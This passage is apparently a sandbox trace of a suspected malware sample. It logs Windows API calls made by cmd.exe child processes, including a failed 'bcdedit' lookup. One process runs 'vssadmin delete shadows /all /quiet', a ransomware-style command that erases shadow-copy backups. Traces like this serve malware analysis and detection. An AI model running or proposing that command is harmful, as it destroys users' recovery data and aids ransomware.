GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0062.884] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0062.885] GetProcessHeap () returned 0x600000 [0062.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20c) returned 0x612e38 [0062.885] GetConsoleTitleW (in: lpConsoleTitle=0x612e38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.885] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0062.885] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0062.886] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0062.886] GetProcessHeap () returned 0x600000 [0062.886] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x400a) returned 0x616a60 [0062.886] GetProcessHeap () returned 0x600000 [0062.886] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616a60 | out: hHeap=0x600000) returned 1 [0062.887] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0062.887] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0062.887] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0062.887] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0062.887] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0062.887] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0062.887] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0062.887] GetProcessHeap () returned 0x600000 [0062.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x613050 [0062.887] GetProcessHeap () returned 0x600000 [0062.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18) returned 0x6130b0 [0062.888] GetProcessHeap () returned 0x600000 [0062.888] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6e) returned 0x6130d0 [0062.889] GetConsoleTitleW (in: lpConsoleTitle=0x3ff788, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.890] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0062.890] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0062.890] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0062.890] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0062.890] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0062.890] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0062.891] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0062.891] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0062.891] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0062.891] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0062.891] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0062.891] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0062.891] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0062.891] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0062.891] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0062.891] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0062.891] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0062.891] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0062.891] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0062.891] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0062.891] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0062.891] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0062.891] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0062.891] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0062.891] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0062.891] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0062.891] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0062.891] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0062.891] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0062.891] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0062.891] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0062.891] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0062.891] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0062.891] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0062.892] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0062.892] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0062.892] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0062.892] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0062.892] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0062.892] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0062.892] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0062.892] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0062.892] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0062.892] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0062.892] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0062.892] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0062.892] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0062.892] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0062.892] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0062.892] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0062.892] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0062.892] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0062.892] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0062.892] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0062.892] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0062.892] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0062.892] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0062.892] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0062.892] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0062.892] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0062.893] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0062.893] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0062.893] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0062.893] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0062.893] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0062.893] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0062.893] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0062.893] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0062.893] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0062.893] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0062.893] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0062.893] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0062.893] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0062.893] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0062.893] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0062.893] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0062.893] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0062.893] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0062.893] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0062.893] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0062.893] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0062.893] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0062.893] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0062.893] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0062.893] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0062.893] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0062.893] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0062.894] GetProcessHeap () returned 0x600000 [0062.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x210) returned 0x613148 [0062.894] GetProcessHeap () returned 0x600000 [0062.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x7e) returned 0x613360 [0062.894] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0062.894] GetProcessHeap () returned 0x600000 [0062.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x418) returned 0x6007f0 [0062.894] SetErrorMode (uMode=0x0) returned 0x0 [0062.894] SetErrorMode (uMode=0x1) returned 0x0 [0062.895] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6007f8, lpFilePart=0x3ff2a8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff2a8*="Desktop") returned 0x25 [0062.895] SetErrorMode (uMode=0x0) returned 0x1 [0062.895] GetProcessHeap () returned 0x600000 [0062.895] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6007f0, Size=0x64) returned 0x6007f0 [0062.895] GetProcessHeap () returned 0x600000 [0062.895] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6007f0) returned 0x64 [0062.895] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.895] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0062.895] GetProcessHeap () returned 0x600000 [0062.895] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x6133e8 [0062.895] GetProcessHeap () returned 0x600000 [0062.895] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x238) returned 0x600860 [0062.904] GetProcessHeap () returned 0x600000 [0062.904] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x600860, Size=0x122) returned 0x600860 [0062.904] GetProcessHeap () returned 0x600000 [0062.904] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x600860) returned 0x122 [0062.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0063.190] GetProcessHeap () returned 0x600000 [0063.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xe0) returned 0x613510 [0063.191] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x613510, Size=0x76) returned 0x613510 [0063.191] GetProcessHeap () returned 0x600000 [0063.191] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x613510) returned 0x76 [0063.643] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.651] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.651] GetLastError () returned 0x2 [0063.651] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.651] GetLastError () returned 0x2 [0063.651] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.652] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.652] GetLastError () returned 0x2 [0063.652] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.652] GetLastError () returned 0x2 [0063.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.652] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.653] GetLastError () returned 0x2 [0063.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.653] GetLastError () returned 0x2 [0063.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.653] GetLastError () returned 0x2 [0063.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.654] GetLastError () returned 0x2 [0063.654] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.654] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.657] GetLastError () returned 0x2 [0063.657] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3ff024, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff024) returned 0xffffffff [0063.660] GetLastError () returned 0x2 [0064.386] _get_osfhandle (_FileHandle=2) returned 0xb [0064.386] GetFileType (hFile=0xb) returned 0x2 [0064.387] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0064.387] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x3ff478 | out: lpMode=0x3ff478) returned 1 [0064.387] _get_osfhandle (_FileHandle=2) returned 0xb [0064.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x3ff4ac | out: lpConsoleScreenBufferInfo=0x3ff4ac) returned 1 [0064.388] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0064.388] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x3ff4ec | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0064.388] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x3ff4d0, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x3ff4d0*=0x62) returned 1 [0064.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.389] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.390] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.390] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0064.390] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.390] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0064.391] SetConsoleInputExeNameW () returned 0x1 [0064.391] GetConsoleOutputCP () returned 0x1b5 [0064.391] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0064.391] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.391] exit (_Code=1) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42cfb000" os_pid = "0x6c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "cmd.exe /c vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0x664 [0062.751] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc44 | out: lpSystemTimeAsFileTime=0x2efc44*(dwLowDateTime=0x1a2084c0, dwHighDateTime=0x1d62227)) [0062.751] GetCurrentProcessId () returned 0x6c0 [0062.751] GetCurrentThreadId () returned 0x664 [0062.752] GetTickCount () returned 0x11497ae [0062.752] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc3c | out: lpPerformanceCount=0x2efc3c*=18270695270) returned 1 [0062.753] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0062.753] __set_app_type (_Type=0x1) [0062.753] __p__fmode () returned 0x770331f4 [0062.815] __p__commode () returned 0x770331fc [0062.815] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0062.815] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0062.816] GetCurrentThreadId () returned 0x664 [0062.816] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x664) returned 0x60 [0062.816] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.816] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0062.816] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.817] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0062.817] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efbd4 | out: phkResult=0x2efbd4*=0x0) returned 0x2 [0062.817] VirtualQuery (in: lpAddress=0x2efc0b, lpBuffer=0x2efba4, dwLength=0x1c | out: lpBuffer=0x2efba4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.817] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efba4, dwLength=0x1c | out: lpBuffer=0x2efba4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0062.817] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efba4, dwLength=0x1c | out: lpBuffer=0x2efba4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0062.817] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efba4, dwLength=0x1c | out: lpBuffer=0x2efba4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.817] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efba4, dwLength=0x1c | out: lpBuffer=0x2efba4*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0062.818] GetConsoleOutputCP () returned 0x1b5 [0062.818] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.818] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0062.818] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.818] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0062.818] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.818] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0062.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.819] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.819] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.819] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0062.819] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.819] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0062.820] GetEnvironmentStringsW () returned 0x562018* [0062.820] GetProcessHeap () returned 0x550000 [0062.820] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x562af0 [0062.820] FreeEnvironmentStringsW (penv=0x562018) returned 1 [0062.820] GetProcessHeap () returned 0x550000 [0062.820] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x560c50 [0062.820] GetEnvironmentStringsW () returned 0x562018* [0062.820] GetProcessHeap () returned 0x550000 [0062.820] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x5635c8 [0062.821] FreeEnvironmentStringsW (penv=0x562018) returned 1 [0062.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb44 | out: phkResult=0x2eeb44*=0x68) returned 0x0 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x0, lpData=0x2eeb50*=0x0, lpcbData=0x2eeb48*=0x1000) returned 0x2 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x1, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x0, lpData=0x2eeb50*=0x1, lpcbData=0x2eeb48*=0x1000) returned 0x2 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x0, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x40, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x40, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x0, lpData=0x2eeb50*=0x40, lpcbData=0x2eeb48*=0x1000) returned 0x2 [0062.821] RegCloseKey (hKey=0x68) returned 0x0 [0062.821] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb44 | out: phkResult=0x2eeb44*=0x68) returned 0x0 [0062.821] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x0, lpData=0x2eeb50*=0x40, lpcbData=0x2eeb48*=0x1000) returned 0x2 [0062.822] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x1, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.822] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x0, lpData=0x2eeb50*=0x1, lpcbData=0x2eeb48*=0x1000) returned 0x2 [0062.822] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x0, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.822] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x9, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.822] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x4, lpData=0x2eeb50*=0x9, lpcbData=0x2eeb48*=0x4) returned 0x0 [0062.822] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb4c, lpData=0x2eeb50, lpcbData=0x2eeb48*=0x1000 | out: lpType=0x2eeb4c*=0x0, lpData=0x2eeb50*=0x9, lpcbData=0x2eeb48*=0x1000) returned 0x2 [0062.822] RegCloseKey (hKey=0x68) returned 0x0 [0062.822] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb031ff [0062.822] srand (_Seed=0x5eb031ff) [0062.822] GetCommandLineW () returned="cmd.exe /c vssadmin delete shadows /all /quiet" [0062.822] GetCommandLineW () returned="cmd.exe /c vssadmin delete shadows /all /quiet" [0062.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.822] GetProcessHeap () returned 0x550000 [0062.822] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x562018 [0062.823] GetModuleFileNameW (in: hModule=0x0, 